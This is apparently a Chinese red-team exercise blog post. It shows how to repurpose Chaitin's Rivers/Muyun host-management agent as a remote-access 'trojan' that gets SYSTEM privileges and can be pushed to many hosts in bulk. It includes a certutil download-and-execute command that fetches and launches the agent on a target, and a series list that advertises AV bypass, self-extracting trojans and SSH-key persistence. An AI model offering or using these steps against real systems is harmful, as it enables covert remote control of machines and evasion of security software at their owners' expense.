合集 – 逸尘-实战攻防演练(5)
1.实战攻防演练–利用微软自带Certutil命令ByPassAV上传C22023-10-202.实战攻防演练-利用Everything搜索软件进行内网后渗透利用2023-10-213.实战攻防演练-WinRar压缩包创建自解压木马2023-10-17
4.实战攻防演练-利用长亭百川云平台上线远控提权2023-10-245.实战攻防演练-Linux写入ssh密钥,利用密钥登录2023-10-30
收起
前言
长亭百川云平台是北京长亭未来科技有限公司旗下的 SaaS 产品服务平台,专注于云安全解决方案。其提供牧云·主机管理助手、网站监测、牧云·云原生安全平台、雷池 Web 应用防火墙等一系列在线安全产品,帮助企业用户更轻松地治理云安全问题,使云上业务更加安全可靠。在使用中发现该产品可以用于攻防对抗中实战,其生成的客户端可是远程上线,获取到服务器主机任意权限,最后会提升至系统权限,适用于后渗透权限提升维持。
实战演示
网站地址:https://rivers.chaitin.cn
在开始使用长亭百川云服务之前,需要先注册一个百川云账号。有账号后可以在百川云登录
选择进入工作台,选择牧云主机管理助手
其中这里区分三个版本,基础版,体验版,付费版,具体如下所示,掏钱的肯定比不掏好用,看个人情况选择。
Windows上线木马
这里如下所示,windows主机需要浏览器下载后,使用其他命令运行
这里首先下载木马文件后上传至自己的网站服务器,使用certutil命令下载执行
certutil -urlcache -split -f http://127.0.0.1/installer.exe c:installer.exe && start installer.exe
或者直接上传目标服务器运行 start installer.exe
服务端就会上线
配置信息
这里可以对上线主机进行查看基础配置,和文件管理操作
权限提升
如下,我们使用Administrator权限上线执行,牧云管理助手直接获取到系统权限,省去权限提升步骤
Linux上线木马
配置入上一致,linux直接复制命令后,在目标主机执行,详细操作类似于windows操作
详细配置
其他功能
可以执行管理查看docker服务
安全扫描功能可以检测主机漏洞风险,及常见漏洞等
应用市场可以下载各种软件
统一配置
推送命令模块可以对多主机群进行批量上线木马
批量命令执行